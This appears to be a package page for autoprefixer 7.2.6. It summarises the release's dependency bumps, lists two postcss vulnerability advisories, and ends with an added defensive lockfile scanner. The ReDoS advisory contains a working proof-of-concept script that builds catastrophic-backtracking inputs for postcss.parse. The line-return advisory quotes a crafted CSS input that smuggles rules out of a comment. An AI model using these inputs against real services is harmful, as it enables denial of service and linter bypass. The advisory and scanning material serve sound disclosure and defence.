Autoprefixer version 7.2.6 represents a subtle but important update over its predecessor, 7.2.5, primarily focusing on dependency upgrades to ensure compatibility and access to the latest browser support data. The core functionality remains the same: automatically parsing CSS and adding necessary vendor prefixes to CSS rules, leveraging the Can I Use database. This eliminates the developer's burden of manually managing prefixes for various browsers, streamlining the CSS writing process and ensuring cross-browser compatibility.
The key distinction lies in the updated dependencies. Version 7.2.6 incorporates postcss at ^6.0.17 (up from ^6.0.16), browserslist at ^2.11.3 (up from ^2.11.1), and, most importantly, caniuse-lite at ^1.0.30000805 (up from ^1.0.30000791). Updating caniuse-lite matters because it supplies fresh data about browser support for CSS features, allowing autoprefixer to generate more accurate prefixes for the current browser landscape. These updates ensure that autoprefixer knows about the latest browser versions and their respective CSS support, leading to more reliable prefixing. The other dependencies, num2fraction, normalize-range, and postcss-value-parser, remain unchanged, which indicates that the underlying value parsing and manipulation logic was stable between these versions. Since autoprefixer handles critical cross-browser compatibility, keeping up with these minor releases is the simplest way to keep prefix output aligned with current browser support.
All vulnerabilities related to version 7.2.6 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds a CSS string with n repeated, unterminated sourceMappingURL comment openers
// followed by a single "!", which the annotation regexes backtrack over.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts that PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite having originally been inside a comment.
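As an added example (not code from the advisory, autoprefixer or the PostCSS project), the following Node.js script maps every resolved postcss copy in a lockfile onto the two advisories listed above, so that a nested copy pulled in by autoprefixer 7.2.6 (postcss ^6.0.17) is not overlooked. The npm v1 lockfile layout, the minimal semver comparison, and the sample versions are assumptions.

```javascript
// Added example (not the advisory's or PostCSS's code). Ranges are from the text
// above; the ReDoS range is read as "< 7.0.36, or >= 8.0.0 and < 8.2.13" (assumed fixed in 8.2.13).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error("unparseable version: " + v);
  return m.slice(1, 4).map(Number);
}
// Negative, zero or positive, like a sort comparator (prerelease tags are ignored).
function compareVersions(a, b) {
  const x = parseVersion(a), y = parseVersion(b);
  for (let i = 0; i < 3; i++) if (x[i] !== y[i]) return x[i] - y[i];
  return 0;
}
const lt = (a, b) => compareVersions(a, b) < 0;
const gte = (a, b) => compareVersions(a, b) >= 0;
// The two postcss advisories listed above, as predicates over a resolved version.
const POSTCSS_ADVISORIES = [
  { id: "ReDoS in lib/previous-map.js",
    affects: (v) => lt(v, "7.0.36") || (gte(v, "8.0.0") && lt(v, "8.2.13")) },
  { id: "CR line-return comment parsing", affects: (v) => lt(v, "8.4.31") },
];
function postcssAdvisoriesFor(version) {
  return POSTCSS_ADVISORIES.filter((a) => a.affects(version)).map((a) => a.id);
}
// Walk an npm v1-style lockfile object ({ dependencies: { name: { version,
// dependencies } } }) and report every resolved postcss copy, nested ones included.
function scanLockfile(lock) {
  const findings = [];
  const walk = (deps, path) => {
    for (const [name, info] of Object.entries(deps || {})) {
      const here = path.concat(name);
      if (name === "postcss") {
        const advisories = postcssAdvisoriesFor(info.version);
        if (advisories.length) findings.push({ path: here.join(" > "), version: info.version, advisories });
      }
      walk(info.dependencies, here);  // transitive copies are the ones a top-level check misses
    }
  };
  walk(lock.dependencies, []);
  return findings;
}
// Constructed sample lockfile: autoprefixer 7.2.6 resolving its postcss ^6.0.17
// dependency to 6.0.17, beside a top-level postcss already at the fixed 8.4.31.
const SAMPLE_LOCK = { dependencies: {
  autoprefixer: { version: "7.2.6", dependencies: { postcss: { version: "6.0.17" } } },
  postcss: { version: "8.4.31" },
} };
for (const f of scanLockfile(SAMPLE_LOCK)) console.log(`${f.path}@${f.version}: ${f.advisories.join("; ")}`);
```

On the constructed sample only the nested 6.0.17 copy is reported, and it matches both advisories.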